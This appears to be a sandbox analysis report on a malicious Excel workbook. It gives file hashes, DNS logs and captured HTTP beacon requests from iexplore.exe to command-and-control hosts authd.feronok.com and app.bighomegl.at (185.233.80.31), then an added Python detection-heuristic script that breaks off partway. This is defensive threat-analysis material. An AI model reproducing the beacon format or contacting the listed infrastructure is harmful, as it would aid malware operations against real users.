                                                                                                                                                                SHA1:83A40621449F135465C3B8A0FCA9742FF01EEACA
                                                                                                                                                                SHA-256:7BDA9BD1427A2E850C01D9B8E037AC368A80366020826A3F7AC0623E874F7451
                                                                                                                                                                SHA-512:8DEE2CCA1EBB74BC12A8DD59E6D49F92BA52BB25660625A4243DE097FFC9E5D562A0FD1CF5502EDDAE5274BDE05C94692189678F75F58FFCCF932C6AE18659E6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DFF45289A08011A808.TMP
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40073
                                                                                                                                                                Entropy (8bit):0.6575076740212541
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:kBqoxKAuqR+8aAhK/LMPKV5JLMPKV5iLMPKV53:kBqoxKAuqR+8aAhK/L8KV7L8KVcL8KVJ
                                                                                                                                                                MD5:32969C2D72471F33B0A57C29E0A8A582
                                                                                                                                                                SHA1:EEB9747431108BEF30A6C4B4A4F656A508F84FA3
                                                                                                                                                                SHA-256:F2D93AF08709A19B73A1E55D748DB6109008D26B075F25A4207B5C2A7E080002
                                                                                                                                                                SHA-512:D18BDD675C7568E566562D0905A6305CE0185AAC8F0D5D529900A19D9EE95F4D65AE27D519D56DDFD835C04201E29C8FCCF5A45AAB7A88F897AC37D6D68A3F2F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\Desktop\~$my_attach_82862.xlsb
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):165
                                                                                                                                                                Entropy (8bit):1.6081032063576088
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                                MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                                SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                                SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                                SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                                Static File Info

                                                                                                                                                                General

                                                                                                                                                                File type:Microsoft Excel 2007+
                                                                                                                                                                Entropy (8bit):7.837826149196617
                                                                                                                                                                TrID:
                                                                                                                                                                • Excel Microsoft Office Binary workbook document (47504/1) 49.74%
                                                                                                                                                                • Excel Microsoft Office Open XML Format document (40004/1) 41.89%
                                                                                                                                                                • ZIP compressed archive (8000/1) 8.38%
                                                                                                                                                                File name:my_attach_82862.xlsb
                                                                                                                                                                File size:300462
                                                                                                                                                                MD5:1f155a8f8c53066ef9dba8520cbcf346
                                                                                                                                                                SHA1:75dda503a5f1bbb11c8de9236ff237a7989e8e80
                                                                                                                                                                SHA256:29b13fa315a5249d1654221cf944f097ac4b0c42a133d07365cd3cc6afdd1a10
                                                                                                                                                                SHA512:f3e563c1b12cbd044c641a5cc7b0675ac0a589e01e898aea3105bef9e53f7bd2fe43b176e432955d21c8239a4c564588ed499d168c1f7bcd62337d09c1dffccd
                                                                                                                                                                SSDEEP:6144:HzL4syD+ZIa3R0RocOIHJKWQOBNRdvfAxupyHmEsHAzEKdkTtx5ooTadR/pLVo0M:D+VcGJRj5ooTadRdeFyinFxhlWAAOLf
                                                                                                                                                                File Content Preview:PK..........!.........r.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                                File Icon

                                                                                                                                                                Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                                Static OLE Info

                                                                                                                                                                General

                                                                                                                                                                Document Type:OpenXML
                                                                                                                                                                Number of OLE Files:1

                                                                                                                                                                OLE File "my_attach_82862.xlsb"

                                                                                                                                                                Indicators

                                                                                                                                                                Has Summary Info:
                                                                                                                                                                Application Name:
                                                                                                                                                                Encrypted Document:
                                                                                                                                                                Contains Word Document Stream:
                                                                                                                                                                Contains Workbook/Book Stream:
                                                                                                                                                                Contains PowerPoint Document Stream:
                                                                                                                                                                Contains Visio Document Stream:
                                                                                                                                                                Contains ObjectPool Stream:
                                                                                                                                                                Flash Objects Count:
                                                                                                                                                                Contains VBA Macros:

                                                                                                                                                                Macro 4.0 Code

(Extracted sheet dump: a comma-separated cell grid in which every cell is empty except one cell containing FALSE; no readable macro formulas were recovered in this export.)

Network Behavior

Network Port Distribution

TCP Packets


UDP Packets

                                                                                                                                                                Jun 11, 2021 05:06:55.097850084 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:03.387378931 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:07:03.465854883 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:18.991520882 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:07:19.060156107 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:20.711811066 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:07:20.772805929 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:33.445947886 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:07:33.507005930 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:34.860609055 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:07:35.167087078 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:38.480021000 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:07:38.557385921 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:55.667896986 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:07:55.739806890 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:56.073646069 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:07:56.135864973 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:02.938903093 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:02.999589920 CEST53612928.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:03.457042933 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:03.510123968 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:04.462721109 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:04.516174078 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:05.510835886 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:05.565514088 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:07.556732893 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:07.610285997 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:11.559844017 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:11.613286018 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:17.462878942 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:17.533377886 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:18.654154062 CEST6194653192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:18.715344906 CEST53619468.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:31.837861061 CEST6491053192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:31.902117014 CEST53649108.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:33.055109024 CEST5212353192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:33.117408037 CEST53521238.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:40.841224909 CEST5613053192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:40.902344942 CEST53561308.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:41.880603075 CEST5633853192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:42.207499027 CEST53563388.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:04.297646046 CEST5942053192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:04.359671116 CEST53594208.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:05.394586086 CEST5878453192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:05.453524113 CEST53587848.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:22.840785027 CEST6397853192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:22.902755976 CEST53639788.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:23.724342108 CEST6293853192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:23.783349037 CEST53629388.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:24.407283068 CEST5570853192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:24.468305111 CEST53557088.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:25.002146959 CEST5680353192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:25.064754963 CEST53568038.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:25.857040882 CEST5714553192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:25.918283939 CEST53571458.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:26.525887966 CEST5535953192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:26.584979057 CEST53553598.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:27.241287947 CEST5830653192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:27.302783012 CEST53583068.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:27.481347084 CEST6412453192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:27.540366888 CEST53641248.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:28.488085032 CEST4936153192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:28.547096014 CEST53493618.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:30.059524059 CEST6315053192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:30.118799925 CEST53631508.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:30.536664963 CEST5327953192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:30.589927912 CEST53532798.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:48.266587973 CEST5688153192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:48.331005096 CEST53568818.8.8.8192.168.2.3

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jun 11, 2021 05:06:40.380889893 CEST | 192.168.2.3 | 8.8.8.8 | 0xe084 | Standard query (0) | quickbooks.aeymotors.com | A (IP address) | IN (0x0001)
Jun 11, 2021 05:07:34.860609055 CEST | 192.168.2.3 | 8.8.8.8 | 0x1580 | Standard query (0) | authd.feronok.com | A (IP address) | IN (0x0001)
Jun 11, 2021 05:08:18.654154062 CEST | 192.168.2.3 | 8.8.8.8 | 0xd547 | Standard query (0) | authd.feronok.com | A (IP address) | IN (0x0001)
Jun 11, 2021 05:08:41.880603075 CEST | 192.168.2.3 | 8.8.8.8 | 0xd78b | Standard query (0) | app.bighomegl.at | A (IP address) | IN (0x0001)
Jun 11, 2021 05:09:05.394586086 CEST | 192.168.2.3 | 8.8.8.8 | 0xdfd3 | Standard query (0) | authd.feronok.com | A (IP address) | IN (0x0001)
Jun 11, 2021 05:09:27.481347084 CEST | 192.168.2.3 | 8.8.8.8 | 0xe8d0 | Standard query (0) | app.bighomegl.at | A (IP address) | IN (0x0001)
Jun 11, 2021 05:09:48.266587973 CEST | 192.168.2.3 | 8.8.8.8 | 0xb1cd | Standard query (0) | authd.feronok.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jun 11, 2021 05:06:40.458628893 CEST | 8.8.8.8 | 192.168.2.3 | 0xe084 | No error (0) | quickbooks.aeymotors.com | | 50.87.220.158 | A (IP address) | IN (0x0001)
Jun 11, 2021 05:07:35.167087078 CEST | 8.8.8.8 | 192.168.2.3 | 0x1580 | No error (0) | authd.feronok.com | | 185.233.80.31 | A (IP address) | IN (0x0001)
Jun 11, 2021 05:07:55.739806890 CEST | 8.8.8.8 | 192.168.2.3 | 0xba06 | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 05:08:18.715344906 CEST | 8.8.8.8 | 192.168.2.3 | 0xd547 | No error (0) | authd.feronok.com | | 185.233.80.31 | A (IP address) | IN (0x0001)
Jun 11, 2021 05:08:42.207499027 CEST | 8.8.8.8 | 192.168.2.3 | 0xd78b | No error (0) | app.bighomegl.at | | 185.233.80.31 | A (IP address) | IN (0x0001)
Jun 11, 2021 05:09:05.453524113 CEST | 8.8.8.8 | 192.168.2.3 | 0xdfd3 | No error (0) | authd.feronok.com | | 185.233.80.31 | A (IP address) | IN (0x0001)
Jun 11, 2021 05:09:27.540366888 CEST | 8.8.8.8 | 192.168.2.3 | 0xe8d0 | No error (0) | app.bighomegl.at | | 185.233.80.31 | A (IP address) | IN (0x0001)
Jun 11, 2021 05:09:48.331005096 CEST | 8.8.8.8 | 192.168.2.3 | 0xb1cd | No error (0) | authd.feronok.com | | 185.233.80.31 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• authd.feronok.com
• app.bighomegl.at

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49732 | 185.233.80.31 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 05:07:35.230685949 CEST | 2298 | OUT | GET /j0D4WkqJA4qbSI2s/tbqllkJ5QjS02c9/Y4oADFKhbig2E3MZ8L/S5BHZDPll/SOOSmvbSSzszfQOGO_2F/ebssg7ZOH9iTiK1egYa/TYvtl48FqSo7aXNnyk8zDn/0M4_2F1RU9EXO/TpeNu_2B/RPWPT_2BSfoiOaYRvUkNxcz/WR4a1P2fCQ/k1EnQMOdYbM0XsiH2/reukwmEF53hW/xa5HBUgFOAx/sGDiJ22uuBIopz/tZj9wmd1r7z3ANuAYbfIk/bhnJIJVnJvAXbS6_/2Fsif8yHgRIg6fa/a0BPP1Z_2FHpWsn1gk/fe5cFcowW/IKK9U HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: authd.feronok.com
Connection: Keep-Alive
Jun 11, 2021 05:07:35.765377045 CEST | 2298 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Jun 2021 03:07:35 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Content-Encoding: gzip
Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49742 | 185.233.80.31 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 05:08:18.773828030 CEST | 5430 | OUT | GET /c0Zjvpk_/2BhHkEQKFoUb3aKx_2FuhQ9/zz1UpsMDGJ/MqFrowSgYmc2fzVA2/yf5xhKlVBQKb/rwrgpqZOvNV/mxBLQ1oxc7jv8k/5tQFefyNUnYTHJj33dQKu/YqZyqYfZuaOHFPro/3D3_2B6kK9arKKX/Wf1dZBj8QqS_2BWWVF/B7Ahpx3M5/Q3B93_2FcSTrCmxypMPT/8JVp8AUZzhfuucVY_2B/wCiIRjjYq_2FqoNLK9B6bf/0aSehXg9FwafT/cgt8pMOQ/HbDCojQOV1FVprYRnxx13U1/UwN8_2B_2F/vzILJE71SBej4gvGi/FIWIlMn9n/L3 HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: authd.feronok.com
Connection: Keep-Alive
Jun 11, 2021 05:08:19.317267895 CEST | 5430 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Jun 2021 03:08:19 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Content-Encoding: gzip
Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


Session 2: 192.168.2.3:49746 -> 185.233.80.31:80, process C:\Program Files (x86)\Internet Explorer\iexplore.exe

Jun 11, 2021 05:08:42.281996965 CEST | 5468 kBytes transferred | OUT
    GET /8N_2FW41xDzjkhrWQ/7Li83vNh8E0s/iNweknKPsr4/wqFKfz34i2ath6/I0bXROB0tUnNMBxp8qE25/AmJwK10jn6MVat3G/t7FuQx2zVw1ffa5/c7cpkHpQnz9kmDbUqx/Otf3v0Da9/dQZioOeK9Dz9hNXsqwu1/tlEzuHEM4S9kJrg9zGq/RjBYXn9MjpOQGxui0wmfPX/po6OMlacqL3xm/d_2FBFj8/AujuAR6DuH05PJMkT_2BTvZ/D_2BlXEdZ3/ZBW_2FuilrCeiWMje/rHsDq9syNU01/kSBqmc5Fyr_/2B3baeMNkKHxqo/p7TsHB_2FsB3Yjr2vV_2F/OiBfbqWQAEP/P_2F HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: app.bighomegl.at
    Connection: Keep-Alive
Jun 11, 2021 05:08:42.816906929 CEST | 5468 kBytes transferred | IN
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Fri, 11 Jun 2021 03:08:42 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


Session 3: 192.168.2.3:49749 -> 185.233.80.31:80, process C:\Program Files (x86)\Internet Explorer\iexplore.exe

Jun 11, 2021 05:09:05.515579939 CEST | 5470 kBytes transferred | OUT
    GET /Nqnk1j8Pq1gJEs1x5F/Dd1hhfQAv/jtmHiVvgoBkcYEwLzLyA/C5p24Ce9YgRZRzxsjjD/nxl_2BdpzYbVr0QWXmBP9v/GO1k2SCoSQjXR/yxhwTnmC/pDIJ9c_2Bm_2FrJ_2B9wee3/JVSl6ysora/rGjwo8YPYfbP9mT94/HzBvhbCiqM7B/Bi1eHCPiGVL/46J0oLxANcfziq/thqSh_2Bozif3G_2Fo_2F/k6b3HZTG7RK0p_2F/ovJUD_2BB3IEisf/V1SwB6D9ZycfRmjdXo/1wtqe3ptL/omd3M4svRRs8_2F1Zp8h/fMxrdwrQxKRQQ81i3US/ttoCJ HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: authd.feronok.com
    Connection: Keep-Alive
Jun 11, 2021 05:09:06.066171885 CEST | 5471 kBytes transferred | IN
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Fri, 11 Jun 2021 03:09:06 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


Session 4: 192.168.2.3:49757 -> 185.233.80.31:80, process C:\Program Files (x86)\Internet Explorer\iexplore.exe

Jun 11, 2021 05:09:27.597299099 CEST | 5843 kBytes transferred | OUT
    GET /1KWgQnO99/jRkbuys9zmBRLf_2Bfsk/j4hnRgNwvnusz6igqqU/69TUSClHMklgWWKD_2F1Zz/rzeT_2BYOFVhf/cyHjXUJp/RmO3IoI8my48PUoCkU_2Bq5/Szeo_2BZSo/JGYOsrFv3PDanQVBJ/aQVxlvGnm7ma/EvG_2Fcbphd/B7D_2FsJViKTei/G4P6ADPlZ3kryG2o13jPZ/lht8TN_2BF0SOOm1/wlXy9yuuvEg2t5t/0qJz6tISKUfXu3ooK_/2B_2FN_2B/Y8QRyMSJiCCXzc8ct_2F/cWxPiUkWHFklqYWaKgD/HT4v_2FZjRB5pDpaTPvsKl/vHhtteYEDrQEo/F_2BGZVP/fKC323Rf/6 HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
    Host: app.bighomegl.at
Jun 11, 2021 05:09:28.119246960 CEST | 6020 kBytes transferred | IN
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Fri, 11 Jun 2021 03:09:28 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 548
    Connection: close
    Vary: Accept-Encoding
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
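
The three complete requests above share one shape: a GET to a bare hostname with a very long path made of many "directory" segments that contain only base64 characters plus the tokens _2B and _2F, the URL-encoded forms of '+' and '/' with '%' swapped for '_'. Sessions 2 and 3 leave from inside iexplore.exe with the browser's own headers, while session 4 uses a hard-coded "MSIE 8.0" User-Agent and no Accept headers. The server side is instructive too: all four sessions end in a 404, and the body differs only because nginx's default msie_padding appends the "<!-- a padding ... -->" comments when the UA contains "MSIE", so a signature on the 404 body alone would be fragile. The script below is an added example, not part of this report; the request data is copied from the sessions above, the CONTROL request is constructed, and the score thresholds are the author's choice. It does not decrypt the payload (no key is available), it only folds each path back into the base64 alphabet to show that the path structure is cosmetic and scores the header anomalies.

```python
"""Heuristics for the beacon requests in the HTTP sessions above.

Added example, not part of the Joe Sandbox report. The three complete requests
(host, path, headers) are copied from the report; CONTROL is constructed for
contrast. Nothing here decrypts anything: the path is only folded back into the
base64 alphabet to show that its directory structure is cosmetic.
"""
import re
from typing import Dict, List, Tuple

# Header sets as they appear in the report. Sessions 2 and 3 carry the browser's
# own headers (the requests leave from inside iexplore.exe); session 4 carries a
# hard-coded MSIE 8.0 UA and no Accept* headers.
BROWSER_HEADERS: Dict[str, str] = {
    "Accept": "text/html, application/xhtml+xml, image/jxr, */*",
    "Accept-Language": "en-US",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko",
    "Accept-Encoding": "gzip, deflate",
    "Connection": "Keep-Alive",
}
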